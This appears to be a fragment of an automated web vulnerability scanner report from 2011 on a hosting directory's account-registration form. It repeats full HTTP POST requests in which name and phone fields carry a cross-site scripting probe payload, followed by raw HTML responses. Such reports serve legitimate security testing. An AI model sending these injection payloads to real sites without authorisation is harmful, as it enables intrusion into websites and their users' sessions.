value='325A5101EE35607358FB2C501E9D5A346F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607395274B09727AFBB86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073F0DA46BF0B53D46E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  3
first_name        POST  '"--></style></script><script>alert(0x001CE1)</script>
last_name         POST  Smith
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 579
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE1)%3c%2fscript%3e&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073824055B018548D20C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073A6F0D249EB39E26D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE35607361E67A86CE5946B5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560730AC52E4392916416C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073D800B7AF8D66BAF06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E414B3C817CDCD62C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE35607375DEFB6F3F3862FEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073A806918CEEDD134A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073A6BF090D3691DFF9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073FE6F935A5BCF4AD56F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE3560738F6D7A93301AFDA5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073D43CFF6E8A3FC63FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE3560730240EBB49A922D02C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073275EEC00AE0100F2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE35607322757DE9B9604EE5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073A55563E1CE7B9F49C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073B6E18F6EB92B982C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE3560738EA57356AC28348E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE35607360D4215F621F68A76F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  3
first_name        POST  Smith
last_name         POST  '"--></style></script><script>alert(0x001CE2)</script>
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 579
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE2)%3c%2fscript%3e&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  3
first_name        POST  Smith
last_name         POST  Smith
owner_first_name  POST  '"--></style></script><script>alert(0x001CE3)</script>
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 579
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE3)%3c%2fscript%3e&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter          Type   Value
account_type       POST   1
address            POST   3
address2           POST   3
B1                 POST   Create An Account!
bill_address       POST   3
bill_address2      POST   3
bill_city          POST   3
bill_country       POST   240
bill_phone         POST   3
bill_province      POST   3
bill_state         POST   3
bill_zip           POST   3
card_number        POST   3
card_type          POST   1
city               POST   3
company_name       POST   Smith
copy_from_cont     POST   1
country            POST   240
deposit            POST   3
e_mail             POST   netsparker@example.com
expire_date        POST   3
first_name         POST   Smith
last_name          POST   Smith
owner_first_name   POST   Smith
owner_last_name    POST   '"--></style></script><script>alert(0x001CE4)</script>
password           POST   3
phone              POST   3
promo_code         POST   3
province           POST   3
retype_e_mail      POST   netsparker@example.com
retype_password    POST   3
state              POST   3
zip                POST   3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 579
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE4)%3c%2fscript%3e&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter          Type   Value
account_type       POST   1
address            POST   3
address2           POST   3
B1                 POST   Create An Account!
bill_address       POST   3
bill_address2      POST   3
bill_city          POST   3
bill_country       POST   240
bill_phone         POST   3
bill_province      POST   3
bill_state         POST   3
bill_zip           POST   3
card_number        POST   3
card_type          POST   1
city               POST   3
company_name       POST   Smith
copy_from_cont     POST   1
country            POST   240
deposit            POST   3
e_mail             POST   netsparker@example.com
expire_date        POST   3
first_name         POST   Smith
last_name          POST   Smith
owner_first_name   POST   Smith
owner_last_name    POST   Smith
password           POST   3
phone              POST   '"--></style></script><script>alert(0x001CF4)</script>
promo_code         POST   3
province           POST   3
retype_e_mail      POST   netsparker@example.com
retype_password    POST   3
state              POST   3
zip                POST   3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF4)%3c%2fscript%3e&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
